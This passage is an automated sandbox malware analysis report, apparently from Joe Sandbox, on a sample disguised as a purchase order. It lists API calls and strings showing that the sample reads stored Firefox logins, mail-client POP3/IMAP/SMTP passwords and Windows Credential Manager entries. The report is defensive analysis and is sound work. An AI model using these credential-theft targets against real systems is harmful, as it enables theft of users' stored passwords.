                                                              • memset.MSVCRT ref: 0040E5B8
                                                              • memset.MSVCRT ref: 0040E5CD
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                              • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                              • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                              • memset.MSVCRT ref: 0040E6B5
                                                              • memset.MSVCRT ref: 0040E6CC
                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                              • memset.MSVCRT ref: 0040E736
                                                              • memset.MSVCRT ref: 0040E74F
                                                              • sprintf.MSVCRT ref: 0040E76D
                                                              • sprintf.MSVCRT ref: 0040E788
                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                              • memset.MSVCRT ref: 0040E858
                                                              • sprintf.MSVCRT ref: 0040E873
                                                              • _strcmpi.MSVCRT ref: 0040E889
                                                              • _strcmpi.MSVCRT ref: 0040E8A5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                              • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                              • API String ID: 4171719235-3943159138
                                                              • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                              • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                              • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                              • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                              • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                              • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                              • GetWindowRect.USER32(?,?), ref: 00410487
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                              • GetDC.USER32 ref: 004104E2
                                                              • strlen.MSVCRT ref: 00410522
                                                              • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                              • ReleaseDC.USER32(?,?), ref: 00410580
                                                              • sprintf.MSVCRT ref: 00410640
                                                              • SetWindowTextA.USER32(?,?), ref: 00410654
                                                              • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                              • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                              • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                              • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                              • GetClientRect.USER32(?,?), ref: 004106DD
                                                              • GetWindowRect.USER32(?,?), ref: 004106E7
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                              • GetClientRect.USER32(?,?), ref: 00410737
                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                              • String ID: %s:$EDIT$STATIC
                                                              • API String ID: 1703216249-3046471546
                                                              • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                              • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                              • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                              • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                              APIs
                                                              • memset.MSVCRT ref: 004024F5
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                              • _mbscpy.MSVCRT(?,00000000,?,?,?,7568EB20,?,00000000), ref: 00402533
                                                              • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$QueryValuememset
                                                              • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                              • API String ID: 168965057-606283353
                                                              • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                              • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                              • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                              • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                              • LoadCursorA.USER32(00000067), ref: 0040115F
                                                              • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                              • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                              • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                              • EndDialog.USER32(?,00000001), ref: 0040121A
                                                              • DeleteObject.GDI32(?), ref: 00401226
                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                              • ShowWindow.USER32(00000000), ref: 00401253
                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                              • ShowWindow.USER32(00000000), ref: 00401262
                                                              • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                              • memset.MSVCRT ref: 0040128E
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                              • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                              • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                              • String ID:
                                                              • API String ID: 2998058495-0
                                                              • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                              • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                              • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                              • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                              APIs
                                                              • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                              • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                              • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                              • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                              • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                              • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                              • API String ID: 231171946-2189169393
                                                              • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                              • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                              • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$memsetsprintf$_mbscpy
                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                              • API String ID: 633282248-1996832678
                                                              • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                              • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                              • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                              • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: sprintf$memset$_mbscpy
                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                              • API String ID: 3402215030-3842416460
                                                              • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                              • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                              • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                              • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                              APIs
                                                                • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                              • strlen.MSVCRT ref: 0040F139
                                                              • strlen.MSVCRT ref: 0040F147
                                                              • memset.MSVCRT ref: 0040F187
                                                              • strlen.MSVCRT ref: 0040F196
                                                              • strlen.MSVCRT ref: 0040F1A4
                                                              • memset.MSVCRT ref: 0040F1EA
                                                              • strlen.MSVCRT ref: 0040F1F9
                                                              • strlen.MSVCRT ref: 0040F207
                                                              • _strcmpi.MSVCRT ref: 0040F2B2
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                              • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                              • String ID: logins.json$none$signons.sqlite$signons.txt
                                                              • API String ID: 2003275452-3138536805
                                                              • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                              • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                              • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                              • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C3F7
                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                              • strrchr.MSVCRT ref: 0040C417
                                                              • _mbscat.MSVCRT ref: 0040C431
                                                              • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                              • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                              • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                              • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                              • API String ID: 1012775001-1343505058
                                                              • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                              • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                              • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                              • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                              APIs
                                                              • memset.MSVCRT ref: 00444612
                                                                • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                              • strlen.MSVCRT ref: 0044462E
                                                              • memset.MSVCRT ref: 00444668
                                                              • memset.MSVCRT ref: 0044467C
                                                              • memset.MSVCRT ref: 00444690
                                                              • memset.MSVCRT ref: 004446B6
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                              • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                              • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                              • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset$strlen$_mbscpy
                                                              • String ID: salu
                                                              • API String ID: 3691931180-4177317985
                                                              • Opcode ID: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                              • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                              • Opcode Fuzzy Hash: b7cf63fef92e37f4bb0d3b69adaea4b1cc931356000d291c0cdd30d7a2f6e4ad
                                                              • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                              • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                              • API String ID: 2449869053-232097475
                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                              APIs
                                                              • sprintf.MSVCRT ref: 0040957B
                                                              • LoadMenuA.USER32(?,?), ref: 00409589
                                                                • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                              • DestroyMenu.USER32(00000000), ref: 004095A7
                                                              • sprintf.MSVCRT ref: 004095EB
                                                              • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                              • memset.MSVCRT ref: 0040961C
                                                              • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                              • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                              • DestroyWindow.USER32(00000000), ref: 0040965C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                              • String ID: caption$dialog_%d$menu_%d
                                                              • API String ID: 3259144588-3822380221
                                                              • Opcode ID: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                              • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                              • Opcode Fuzzy Hash: 28b324c1556d4b5440d18e0b4d206da1123046d85e66521c8e04ac1cff3212ab
                                                              • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                              APIs
                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                              • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                              • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                              • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                              • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$FreeLoad
                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                              • API String ID: 2449869053-4258758744
                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
